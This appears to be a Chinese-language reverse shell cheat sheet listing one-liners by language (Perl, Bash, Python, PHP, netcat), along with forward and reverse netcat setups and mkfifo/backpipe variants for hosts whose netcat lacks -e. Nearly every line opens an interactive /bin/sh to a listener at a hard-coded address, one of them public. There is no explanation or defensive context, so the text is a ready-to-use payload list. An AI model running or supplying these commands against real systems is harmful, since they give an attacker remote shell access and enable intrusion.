Perl版

1
perl -e 'use Socket;$i="192.168.211.1";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.211.1:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Bash版

1
bash -c 'sh -i &>/dev/tcp/192.168.211.1/7777 0>&1'
1
bash -i >& /dev/tcp/192.168.211.1/7777 0>&1

python版

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("120.27.32.227",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php版

1
php -r '$sock=fsockopen("10.1.1.19",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

nc版

正向连接

1
2
3
服务器端: nc -l -p 7777 -e /bin/bash

攻击机: nc 192.168.211.231 7777

反向连接

1
2
3
服务器端:nc -e /bin/sh 192.168.211.1 7777

攻击机端: nc -lvvp 7777

没有-e的

需要root权限

1
2
3
4
5
6
服务器端:
root@p0desta:~# rm /tmp/backpipe;mknod /tmp/backpipe p
root@p0desta:~# /bin/sh 0</tmp/backpipe | nc 192.168.211.1 7777 1>/tmp/backpipe

攻击机端:
nc -lvvp 7777

不需要root权限

1
2
root@p0desta:~# rm /tmp/backpipe;mkfifo /tmp/backpipe
root@p0desta:~# /bin/sh 0</tmp/backpipe | nc 192.168.211.1 7777 1>/tmp/backpipe
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.211.1 7777  >/tmp/f